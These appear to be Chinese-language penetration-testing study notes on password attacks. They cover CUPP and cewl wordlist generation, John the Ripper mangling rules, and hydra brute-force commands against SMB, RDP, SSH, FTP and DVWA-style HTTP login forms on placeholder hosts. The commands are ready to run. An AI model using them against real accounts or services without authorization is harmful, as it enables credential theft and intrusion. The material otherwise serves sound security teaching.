字典

CUPP

• 按个人信息生成其专属的密码字典

• CUPP：Common User Password Profiler

安装

git clone https://github.com/Mebus/cupp.git

使用

python cupp.py-i

• 输入上面命令会和程序进行交互，输入相关的信息就行

通过收集网站信息生成字典

cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt

# -m:最小单词长度
-d 爬网深度
-e 收集包含email地址信息
-c 每个单词出现次数
支持基本、摘要身份认证
支持代理

用户密码变型

• 基于cewl的结果进行密码类型

• 末尾增加数字串

• 字母大小写变化

• 字母与符号互相转换

• 字母与数字互相转换

• P@$$w0rd

使用John the Ripper配置文件实现密码动态变型

/etc/john/john.conf
- [List.Rules:Wordlist]
- $[0-9]$[0-9]$[0-9]
- john --wordlist=cewl.txt -rules --stdout > m.txt (根据基本的字典生成新的字典)

-[list.Rules:test]
$[0-9]$[0-9]$[0-9]$[a-zA-Z]
$[0-9]$[0-9]$[0-9]$[a-zA-Z]$[a-zA-Z]$[a-zA-Z]$[`~!@#$%^&*()-_=+]
- john --wordlist=cewl.txt --rules=test --stdout > m.txt
- john --wordlist=ahm.lst --rules=test HASHFILE

在线密码破解——hydra

hydra

• 九头蛇，砍去一个头即长出新头，后为大力神赫拉克勒斯所杀

Windows密码破解

hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vV
hydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV

Linux密码破解

hydra -l root -P pass.lst ssh://1.1.1.1 -vV

其他服务密码破解

hydra -L user.lst -P pass.lst ftp://1.1.1.1 -s 2121 -e nsr -o p.txt -t 64

图形化界面

xhydra

HTTP表单身份认证

hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Lin:S=index.php" -V

hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login Failed" -V

/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo:Foo
C:先访问指定页面获得cookie
H：指定http头
https-post-form\http-get-form\https-get-form
-S:使用SSL连接